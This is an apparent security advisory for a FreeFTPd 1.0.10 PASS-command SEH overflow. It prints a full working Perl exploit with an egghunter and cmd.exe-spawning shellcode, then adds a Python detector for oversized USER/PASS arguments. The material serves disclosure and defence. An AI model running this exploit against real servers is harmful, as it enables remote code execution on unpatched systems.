Release date:
Updated on: 2013-08-22
Affected Systems:
FreeFTPd 1.0.10
Description:
--------------------------------------------------------------------------------
Bugtraq id: 61905
FreeFTPd is a free FTP + SSL/SFTP server based on WeOnlyDo FTP/SFTP.
FreeFTPd 1.0.10 has a buffer overflow vulnerability in its implementation of the 'pass' command: an over-long PASS argument sent after an anonymous USER login overwrites the SEH chain. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
Source: Wireghoul
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/perl
# FreeFTPd 1.0.10 anonymous-auth pass seh buffer overflow
# PoC by Wireghoul - www.justanotherhacker.com
# Date: 20130820
# Tested on: XPSP3
# Similar exploits:
# EDB 23079 1330 1339
# Greetz corelan, TecR0C, mr_me, jjkakakk
use IO::Socket::INET;
if (scalar(@ARGV) != 2) { print "Usage $0 host port\n"; exit; }
# Null byte in ppr forces a backwards short jump allowing 128 bytes shellcode max
# Thus we use an egghunter
my $egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"WRGL".
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
# I think the max length for this is ~1024 bytes, didn't bother checking
# Spawn cmd.exe from msfpayload windows/exec cmd=cmd.exe R | msfencode -b '\x0a\x0d' -t perl
my $shell =
"\xd9\xeb\xd9\x74\x24\xf4\x5e\xbf\xe0\xdd\xfb\x11\x33\xc9".
"\xb1\x32\x31\x7e\x1a\x83\xc6\x04\x03\x7e\x16\xe2\x15\x21".
"\x13\x98\xd5\xda\xe4\xfb\x5c\x3f\xd5\x29\x3a\x4b\x44\xfe".
"\x49\x19\x65\x75\x1f\x8a\xfe\xfb\xb7\xbd\xb7\xb6\xe1\xf0".
"\x48\x77\x2d\x5e\x8a\x19\xd1\x9d\xdf\xf9\xe8\x6d\x12\xfb".
"\x2d\x93\xdd\xa9\xe6\xdf\x4c\x5e\x83\xa2\x4c\x5f\x43\xa9".
"\xed\x27\xe6\x6e\x99\x9d\xe9\xbe\x32\xa9\xa1\x26\x38\xf5".
"\x11\x56\xed\xe5\x6d\x11\x9a\xde\x06\xa0\x4a\x2f\xe7\x92".
"\xb2\xfc\xd6\x1a\x3f\xfc\x1f\x9c\xa0\x8b\x6b\xde\x5d\x8c".
"\xa8\x9c\xb9\x19\x2c\x06\x49\xb9\x94\xb6\x9e\x5c\x5f\xb4".
"\x6b\x2a\x07\xd9\x6a\xff\x3c\xe5\xe7\xfe\x92\x6f\xb3\x24".
"\x36\x2b\x67\x44\x6f\x91\xc6\x79\x6f\x7d\xb6\xdf\xe4\x6c".
"\xa3\x66\xa7\xfa\x32\xea\xd2\x42\x34\xf4\xdc\xe4\x5d\xc5".
"\x57\x6b\x19\xda\xb2\xcf\xd5\x90\x9e\x66\x7e\x7d\x4b\x3b".
"\xe3\x7e\xa6\x78\x1a\xfd\x42\x01\xd9\x1d\x27\x04\xa5\x99".
"\xd4\x74\xb6\x4f\xda\x2b\xb7\x45\xb9\xa6\x23\x48\x58\x41".
"\xc9\x94";
my $egg = "user wrglwrgl $shell\r\n";
my $usr = "USER anonymous\r\n"; # Must be an existing anonymous account
# I'm lazy, NOPs are fine by me
my $pre = "PASS" . "\x90" x (797 - length($egghunter)) . $egghunter;
my $seh1 = "\x90\x90\xEB\x80"; # nop, nop, jmp +4
my $seh2 = "\xf0\x42\x41\x00"; # PPR from freeFTPDService.exe (only unsafe SEH module), 0x004142f0
my $pad = "X" x 209 . "\r\n";
my $payload = $pre . $seh1 . $seh2 . $pad;
my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect!\n";
my $eggsock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect!\n";
print $eggsock $egg;
sleep 1;
print $sock $usr;
sleep 1;
print "Preparing exploit\n";
sleep 1;
print $sock $payload;
print "Exploiting\n";
sleep 3;
print "Done\n";
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
FreeFTPd
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users of the software follow the vendor's homepage to obtain the latest version:
http://freeftpd.com/
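While no vendor fix exists, the shape of the PoC above (a PASS argument of roughly 1,000 bytes, almost all of it NOP sled and egghunter bytes, after a plain anonymous USER) is easy to pick out on the FTP control channel. The check below is an added example, not code from the advisory or from FreeFTPd; the 128/256-byte argument limits, the 10% non-printable threshold and the sample session are assumptions I constructed.

```python
from dataclasses import dataclass
from typing import List, Optional

# Assumed thresholds: the PoC's PASS argument is ~1,000 bytes (797-byte NOP/
# egghunter sled, SEH record, 209-byte pad); real credentials are tens of bytes.
ARG_LIMITS = {b"USER": 128, b"PASS": 256}
NONPRINTABLE_MAX_RATIO = 0.1

@dataclass
class Finding:
    line_no: int
    command: str
    reason: str

def nonprintable_ratio(arg: bytes) -> float:
    """Fraction of bytes outside printable ASCII; NOP sleds and shellcode score high."""
    if not arg:
        return 0.0
    return sum(1 for b in arg if b < 0x20 or b > 0x7E) / len(arg)

def inspect_ftp_line(line_no: int, raw: bytes) -> Optional[Finding]:
    """Check one client-to-server control line; only USER and PASS are inspected."""
    cmd, _, arg = raw.rstrip(b"\r\n").partition(b" ")
    limit = ARG_LIMITS.get(cmd.upper())
    if limit is None:
        return None
    name = cmd.upper().decode("ascii", "replace")
    if len(arg) > limit:
        return Finding(line_no, name, f"argument is {len(arg)} bytes, limit {limit}")
    if nonprintable_ratio(arg) > NONPRINTABLE_MAX_RATIO:
        return Finding(line_no, name, "argument is mostly non-printable bytes")
    return None

def scan_session(lines: List[bytes]) -> List[Finding]:
    """Run the check over every line of a captured control-channel session."""
    return [f for n, raw in enumerate(lines, start=1)
            if (f := inspect_ftp_line(n, raw)) is not None]

# Constructed sample session: a normal anonymous login, then a PASS shaped
# like the PoC (long NOP sled plus padding; shellcode omitted).
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER anonymous\r\n",
    b"PASS " + b"\x90" * 800 + b"X" * 209 + b"\r\n",
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.command} {f.reason}")
```

The same two tests (argument length and printable ratio) can be applied server-side as an input validation rule, which is the actual fix for this class of bug.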